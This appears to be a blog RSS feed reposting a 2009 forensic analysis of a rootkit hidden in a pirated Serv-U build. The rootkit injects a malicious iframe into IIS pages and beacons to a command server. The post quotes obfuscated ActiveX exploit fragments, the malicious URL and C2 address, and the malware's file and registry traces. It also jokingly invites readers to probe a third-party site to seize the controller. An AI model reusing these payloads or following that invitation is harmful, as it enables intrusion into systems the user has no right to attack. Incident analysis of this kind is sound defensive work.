<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[静怡家园]]></title> 
<link>http://www.zhanghaijun.com/index.php</link> 
<description><![CDATA[书山有路勤为径，学海无涯苦作舟！]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[静怡家园]]></copyright>
<item>
<link>http://www.zhanghaijun.com/post//</link>
<title><![CDATA[Serv-u汉化版携带的Rootkit分析[转]]]></title> 
<author>碟舞飞扬 &lt;webmaster@zhanghaijun.com&gt;</author>
<category><![CDATA[网海拾贝]]></category>
<pubDate>Fri, 13 Feb 2009 12:15:33 +0000</pubDate> 
<guid>http://www.zhanghaijun.com/post//</guid> 
<description>
<![CDATA[ 
	1、<br/>首先是发现浏览该服务器网页时，最底端加入了一段iframe：<br/>http://bh.jebooo.com/3002.htm<br/>追查该代码，关键字：<br/>BD96C556-65A3-11D0-983A-00C04FC29<br/>var real=new ActiveXObject(&quot;IERPCtl.IERPCtl.1&quot;);<br/>var storm=new window[&quot;ActiveXObject&quot;](&quot;MP&quot;+&quot;S.S&quot;+&quot;tor&quot;+&quot;mPl&quot;+&quot;ayer&quot;);<br/>var Lz=new ActiveXObject(&quot;GLC&quot;+&quot;HAT.G&quot;+&quot;LCh&quot;+&quot;atC&quot;+&quot;trl.1&quot;);<br/>function GetCookie_cnzz(name)<br/>应该是利用了ie的一些activex漏洞进行种木马和刷流量的操作<br/><br/><br/>2、<br/>追查工作暂时放到一边，首要问题是解决服务器异常<br/>最开始是怀疑有arp攻击，登录到服务器上查看<br/>arp -a得到网关mac，与正确的网关mac一致，windump抓包<br/>windump -X -i 3 -n arp<br/>也没有发现异常arp广播<br/>检查web文件，也正常，底部并没有加码<br/>初步确定是服务器本身有问题<br/><br/><br/>3、<br/>继续抓包，查看http包<br/>windump -X -i 3 -s 65535 -n host **.**.**.** and port 80<br/>发现在正常的页面请求结束前，被插入了一段<br/>10:06:39.430635 IP xx.xx.xx.xx.80 &gt; yy.yy.yy.yy.2407: P 254:325(71) ack 417<br/>win 65119<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0000:&nbsp;&nbsp;4500 006f 1251 4000 8006 d0c4 d233 b9ca&nbsp;&nbsp;E..o.Q@......3..<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0010:&nbsp;&nbsp;d233 b941 0050 0967 fddc 6d08 11ce dc82&nbsp;&nbsp;.3.A.P.g..m.....<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0020:&nbsp;&nbsp;5018 fe5f 17d5 0000 0d0a 3c69 6672 616d&nbsp;&nbsp;P.._......&lt;ifram<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0030:&nbsp;&nbsp;6520 7372 633d 6874 7470 3a2f 2f62 682e&nbsp;&nbsp;e.src=http://bh.<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0040:&nbsp;&nbsp;6a65 626f 6f6f 2e63 6f6d 2f33 3030 322e&nbsp;&nbsp;jebooo.com/3002.<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0050:&nbsp;&nbsp;6874 6d20 7769 6474 683d 3020 6865 6967&nbsp;&nbsp;htm.width=0.heig<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0060:&nbsp;&nbsp;6874 3d30 3e3c 2f69 6672 616d 653e 00&nbsp;&nbsp;&nbsp;&nbsp;ht=0&gt;&lt;/iframe&gt;.<br/><br/>正是页面底部被嵌入的iframe<br/>这说明服务器的iis进程或网卡驱动被hook，在侦测到某种类型文件的http请求后，在传输结束前挂马<br/><br/><br/><br/>4、<br/>检查服务器，查看进程、服务、N处注册表启动项、系统帐号<br/>均未发现异常<br/>请出icesword，检查内核模块，发现两个可疑的家伙<br/>XFKnrl.sys 和 rvdport.sys<br/>文件路径都是system32&#92;drivers&#92;，但到该目录下查找并没有这两个文件，基本能确定是rootkit了<br/>正常的内核模块没必要隐藏自己<br/>procexp搜索全部进程的handle，果然<br/>发现在inetinfo进程中有 &#92;device&#92;XFKnrl加载项，iis被插了！<br/><br/><br/><br/>5、<br/>用Wsyscheck和RkUnhooker再进一步检查内核模块和驱动<br/>除了icesword查到的两个sys之外再没有其他发现<br/>ssdt和fsd的各个函数也没有被hook的报告<br/>NtQueryDirectoryFile<br/>NtQuerySystemInformation<br/>NtDeviceIoControlFile<br/>都正常！<br/>但在wsyscheck的“安全检查”-“端口状态”中发现，进程inetinfo每几秒就向61.164.176.139：3002发syn<br/><br/>12:01:20.108071 IP xx.xx.xx.xx.4627 &gt; 61.164.176.139.3002: S 3273827924:32738<br/>27924(0) win 65535 &lt;mss 1460,nop,nop,sackOK&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0000:&nbsp;&nbsp;4500 0030 125f 4000 8006 6e3b d233 b9ca&nbsp;&nbsp;E..0._@...n;.3..<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0010:&nbsp;&nbsp;3da4 b08b 1213 0bba c322 a654 0000 0000&nbsp;&nbsp;=........&quot;.T....<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0020:&nbsp;&nbsp;7002 ffff 81ad 0000 0204 05b4 0101 0402&nbsp;&nbsp;p...............<br/>12:01:20.180418 IP 61.164.176.139.3002 &gt; xx.xx.xx.xx.4627: R 0:0(0) ack 1 win<br/>0<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0000:&nbsp;&nbsp;4500 0028 0186 0000 7306 cc1c 3da4 b08b&nbsp;&nbsp;E..(....s...=...<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0010:&nbsp;&nbsp;d233 b9ca 0bba 1213 0000 0000 c322 a655&nbsp;&nbsp;.3...........&quot;.U<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0020:&nbsp;&nbsp;5014 0000 ae5d 0000 aaaa 0000 aaaa&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; P....]........<br/>12:01:22.592705 IP xx.xx.xx.xx.4628 &gt; 61.164.176.139.3002: S 1189036599:11890<br/>36599(0) win 65535 &lt;mss 1460,nop,nop,sackOK&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0000:&nbsp;&nbsp;4500 0030 126a 4000 8006 6e30 d233 b9ca&nbsp;&nbsp;E..0.j@...n0.3..<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0010:&nbsp;&nbsp;3da4 b08b 1214 0bba 46df 4237 0000 0000&nbsp;&nbsp;=.......F.B7....<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0020:&nbsp;&nbsp;7002 ffff 620d 0000 0204 05b4 0101 0402&nbsp;&nbsp;p...b...........<br/>12:01:22.654909 IP 61.164.176.139.3002 &gt; xx.xx.xx.xx.4628: R 0:0(0) ack 11890<br/>36600 win 0<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0000:&nbsp;&nbsp;4500 0028 2deb 0000 7306 9fb7 3da4 b08b&nbsp;&nbsp;E..(-...s...=...<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0010:&nbsp;&nbsp;d233 b9ca 0bba 1214 0000 0000 46df 4238&nbsp;&nbsp;.3..........F.B8<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0020:&nbsp;&nbsp;5014 0000 8ebd 0000 aaaa 0000 aaaa&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; P.............<br/><br/>61.164.176.139基本可以确定就是rootkit的控制端了<br/><br/><br/><br/><br/>6、<br/>google了一下XFKnrl，没发现太多有用的信息<br/>只好先在system32&#92;drivers&#92;下建立两个0字节的文件XFKnrl.sys 和 rvdport.sys<br/>删除所有文件权限，重启<br/>web页面挂马问题消失，内核模块XFKnrl和rvdport也都没有加载<br/>但进程inetinfo依然向61.164.176.139：3002发包！<br/>先用组策略ipsec封掉到61.164.176.0/24网段和端口3002的通讯<br/>继续检查系统<br/><br/><br/><br/>7、<br/>再次procexp搜索全部进程的handle，没有发现XFKrnl和rvdport的踪影<br/>又检查了一遍内核模块和驱动，没有新发现<br/>目标锁定在了inetinfo进程上<br/>用wsyscheck查inetinfo的线程信息，对比其他正常服务器的该项信息<br/>发现异常线程iisecnv.dll<br/>procexp搜索全部进程的dll，发现iisecnv.dll 插入到了inetinfo.exe和 w3wp.exe中<br/>结束该线程后，inetinfo停止向61.164.176.139：3002发包！<br/>但随后检查内核模块时发现，XFKnrl居然又被加载了！<br/>这至少证明了iisecnv.dll和XFKnrl.sys的关系<br/><br/><br/>8、<br/>搜索注册表iisecnv.dll，发现<br/>[HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Search Assistant&#92;ACMru&#92;5603]<br/>&quot;000&quot;=&quot;iisecnv.dll&quot;<br/>&quot;001&quot;=&quot;mswsock.dll&quot;<br/>&quot;002&quot;=&quot;ntdll.dll&quot;<br/>&quot;003&quot;=&quot;ntkrnlpa.exe&quot;<br/>&quot;004&quot;=&quot;*.gif&quot;<br/>&quot;005&quot;=&quot;usbcams3.sys&quot;<br/>&quot;006&quot;=&quot;AtiSrv.exe&quot;<br/>&quot;007&quot;=&quot;usbhcid.sys&quot;<br/>&quot;008&quot;=&quot;*.exe&quot;<br/><br/>[HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Search Assistant&#92;ACMru&#92;5604]<br/>&quot;000&quot;=&quot;jebooo&quot;<br/>&quot;001&quot;=&quot;bh.jebooo.com&quot;<br/>&quot;002&quot;=&quot;xf.jebooo.com&quot;<br/><br/><br/><br/>9、<br/>终极操作：<br/>在system32&#92;drivers&#92;下建立两个0字节的文件XFKnrl.sys 和 rvdport.sys删除所有文件权限<br/>删除注册表中相关项和文件<br/>用wsyscheck的“重启后删除文件”功能，添加c:/windows/system32/inetsrv/iisecnv.dll，重启<br/><br/>内核模块XFKnrl.sys和rvdport.sys没有被加载，inetinfo进程也不再发包，但IIS崩溃了！<br/>重新安装iis，恢复.net2.0的web扩展服务，重建web站点，貌似一切恢复正常了。<br/><br/><br/><br/>10、<br/>把iisecnv.dll抓到本地，IDA pro分析<br/>基本功能大致包括了：<br/>httpfilter-过滤http协议<br/>hook &#92;&#92;inetsrv&#92;wamreg.dll<br/>加载驱动&nbsp;&nbsp;system32&#92;drivers&#92;XFKnrl.sys<br/>调用cmd.exe<br/>md5filt<br/>aspnet_filter<br/>CopyFileA&nbsp;&nbsp;DeleteFileA&nbsp;&nbsp;隐藏和删除文件<br/><br/><br/>大概能知道这个XFKnrl rootkit都做了些什么，它没有做隐藏进程和端口的操作，对文件也只是在内核模块加载到内存高位后进行删除操作，<br/>所以查ssdt没有什么发现是正常的，开始我还以为真的有这么NB的rootkit可以绕过icesword、wsyscheck和RkUnhooker的检查呢！<br/>主要的功能就是过滤http协议，外加得到一个反弹的shell，如果不是它的驱动是运行在kernel模式，还真不好意思叫它ring0 ！<br/><br/><br/><br/>11、<br/>后续问题：<br/>先去拜访一下61.164.176.139<br/>inetnum:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;61.164.176.128 - 61.164.176.143<br/>netname:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;YIWU-RONGJI-BUISNESS<br/>country:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CN<br/>descr:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Yiwu Rongji Handware Buisness<br/>该段里有个应用系统<br/>http://www.lunababe.com/<br/>估计也是漏洞一大堆，有兴趣的可以去看一下，也许能搞到XFKnrl的控制端，哈哈~<br/><br/><br/>12、<br/>唠叨几句：<br/>中了rootkit最好还是重装<br/>测试用服务器正式上线前最好也是重装<br/>防火墙外运行的服务器拿到里边来之前最好也重装<br/>尽量用从可靠途径获得的系统软件 <br/>Tags - <a href="http://www.zhanghaijun.com/tags/serv-u/" rel="tag">serv-u</a>
]]>
</description>
</item><item>
<link>http://www.zhanghaijun.com/post//#blogcomment</link>
<title><![CDATA[[评论] Serv-u汉化版携带的Rootkit分析[转]]]></title> 
<author> &lt;user@domain.com&gt;</author>
<category><![CDATA[评论]]></category>
<pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> 
<guid>http://www.zhanghaijun.com/post//#blogcomment</guid> 
<description>
<![CDATA[ 
	
]]>
</description>
</item>
</channel>
</rss>